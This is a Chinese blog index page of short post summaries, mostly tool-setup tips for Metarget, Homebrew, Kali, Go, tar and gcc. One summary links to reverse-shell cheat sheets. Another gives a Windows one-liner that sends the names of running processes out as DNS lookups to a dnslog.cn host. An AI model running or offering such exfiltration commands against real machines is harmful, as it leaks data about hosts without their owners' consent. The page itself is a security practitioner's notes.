上一页 1 2 3 4 5 6 7 8 ··· 22 下一页
摘要: Metarget目前仅支持在Ubuntu 16.04和18.04安装运行,在20.04上可能会遇到依赖项问题。安装步骤十分简单。 这里使用Ubuntu 18.04为例进行安装: git clone https://github.com/brant-ruan/metarget.git cd metar 阅读全文
posted @ 2021-10-31 12:54 micr067 阅读(2786) 评论(0) 推荐(0) 编辑
摘要: 1.安装homebrew ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 安装adb brew cask install android-platform-tools 阅读全文
posted @ 2021-10-09 18:23 micr067 阅读(99) 评论(0) 推荐(0) 编辑
摘要: Kali 2021 默认的 xfce 环境成功安装 Parallels Tools重启后会白屏无法进入桌面, 解决办法:重启进入recovery模式,安装 GNOME 桌面环境: apt install kali-desktop-gnome -y 重启后切换桌面环境为 GNOME 即可正常进入桌面。 阅读全文
posted @ 2021-10-04 22:10 micr067 阅读(377) 评论(0) 推荐(0) 编辑
摘要: 在线反弹shell命令速查: https://www.revshells.com/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shel 阅读全文
posted @ 2021-10-04 19:12 micr067 阅读(242) 评论(0) 推荐(0) 编辑
摘要: 1、for循环实现 for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul 2、利用powershell foreach循环实现 powershell -c "Get 阅读全文
posted @ 2021-10-02 17:58 micr067 阅读(214) 评论(0) 推荐(0) 编辑
摘要: https://www.cnblogs.com/samve/p/13629779.html 阅读全文
posted @ 2021-09-23 07:46 micr067 阅读(483) 评论(0) 推荐(0) 编辑
摘要: tar 将目录logs打包压缩并分割成多个1M的文件 tar cjf - logs/ |split -b 1m - logs.tar.bz2. 完成后会产生下列文件: logs.tar.bz2.aa, logs.tar.bz2.ab, logs.tar.bz2.ac 要解压的时候只要执行下面的命令就 阅读全文
posted @ 2021-09-22 15:31 micr067 阅读(1563) 评论(0) 推荐(0) 编辑
摘要: https://blog.csdn.net/weixin_37771454/article/details/111599503 阅读全文
posted @ 2021-09-19 17:03 micr067 阅读(329) 评论(0) 推荐(0) 编辑
摘要: Go默认使用的是proxy.golang.org,在国内无法访问 解决方法: 换一个国内能访问的代理地址:https://goproxy.cn 执行命令: go env -w GOPROXY=https://goproxy.cn 重新执行命令,完美通过! 阅读全文
posted @ 2021-09-18 19:15 micr067 阅读(226) 评论(0) 推荐(0) 编辑
摘要: MacOS 安装gcc 先更新一下xcode(否则报错无法安装) xcode-select --install 再安装gcc@8 brew install gcc@8 设置环境变量 参考:https://www.jianshu.com/p/a8bd126c2a67 阅读全文
posted @ 2021-09-05 19:38 micr067 阅读(108) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 8 ··· 22 下一页